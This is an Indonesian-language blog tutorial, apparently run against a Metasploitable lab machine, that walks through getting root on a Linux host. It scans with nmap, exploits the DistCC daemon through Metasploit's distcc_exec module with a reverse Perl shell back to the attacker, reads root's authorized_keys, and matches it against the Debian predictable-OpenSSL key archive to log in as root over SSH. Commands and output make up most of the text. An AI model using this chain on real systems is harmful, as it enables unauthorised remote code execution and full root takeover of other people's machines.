Tantangan tersulit hacker ketika berhasil masuk ssh adalah mencoba mendapatkan akses ROOT untuk eksploitasi murni. Cara-caranya banyak banget, kali ini saya mau menjelaskan bagaimana caranya rooting dengan memanfaatkan RSA yang diperoleh dari DistCC Daemon (=
Yang diperlukan:
1. Metasploit Framework (metasploit.com/download)
2. ExploitDB (http://www.exploitdb.com)
3. RSA guessable (baca modul untuk mendapatkan link download)
Metode:
1. Login DistCC sebagai Daemon
2. Cari tau RSA key public yang digunakan server
3. Login sebagai root melalui RSA guessable
Tutorial:
Pertama, scan target untuk memahami peta jaringan
Code:
root@blue-dragon:~# nmap -sS -sV -p1-65535 -f -n -vv 192.168.1.8
Code:
root@blue-dragon:~# msfconsoleCari modul DistCC
Code:
msf > search distccGunakan modul --> exploit/unix/misc/distcc_exec
Code:
msf > use exploit/unix/misc/distcc_execSet terget
Code:
msf exploit(distcc_exec) > set RHOST 192.168.1.8Set payload -> interaksi terminal shell (gunakan: "msf > show payloads" lebih dulu untuk mengetahui modul payload yang cocok)
Code:
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse_perlSet remote local (IP attacker)
Code:
msf exploit(distcc_exec) > set LHOST 192.168.1.2
Lakukan exploitasi
Code:
msf exploit(distcc_exec) > exploitPriviledge escalation code + output dalam CODE (=
1. uname -a
Code:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux2. whoami
Code:
daemon3. ls -lart /root /root (check folder root)
Code:
total 32
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
-rwx------ 1 root root 401 Apr 28 2010 reset_logs.sh
-rw------- 1 root root 187 Apr 28 2010 .lesshst
drwxr-xr-x 21 root root 4096 Apr 28 2010 ..
drwxr-xr-x 3 root root 4096 May 17 2010 .
drwxr-xr-x 2 root root 4096 May 17 2010 .ssh
-rw------- 1 root root 123 Nov 13 11:32 .bash_history4. ls -lart /root/.ssh (check folder "/root/.ssh" --> hidden)
Code:
total 12
drwxr-xr-x 3 root root 4096 May 17 2010 ..
drwxr-xr-x 2 root root 4096 May 17 2010 .
-rw-r--r-- 1 root root 405 May 17 2010 authorized_keys5. cat /root/.ssh/authorized_keys (melihat isi authorized_keys)
Code:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitableCatat code RSA untuk digunakan nanti:
Quote:AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w
Code:
root@blue-dragon:/pentest/exploits/exploitdb# ./searchsploit opensslBuka file multiple/remote/5622.txt
Code:
root@blue-dragon:/pentest/exploits/exploitdb# cat platforms//multiple/remote/5622.txtDownload file dari keterangan arsip ExploitDB
Quote:Download RSA di:
http://sugar.metasploit.com/debian_ssh_r...86.tar.bz2
atau
http://exploit-db.com/sploits/debian_ssh...86.tar.bz2
Extract arsip RSA, lalu cari RSA yang cocok dengan server:
Code:
root@blue-dragon:~/tools/rsa/2048# grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkct eZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXl n/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ 5cCs4WocyVxsXovcNnbALTp3w *.pubHasilnya:
Quote:57c3115d77c56390332dc5c49978627a-5429.pub
Code:
root@blue-dragon:~/tools/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.8HACKED!!!
Posted in: BACKTRACK
0 comments:
Post a Comment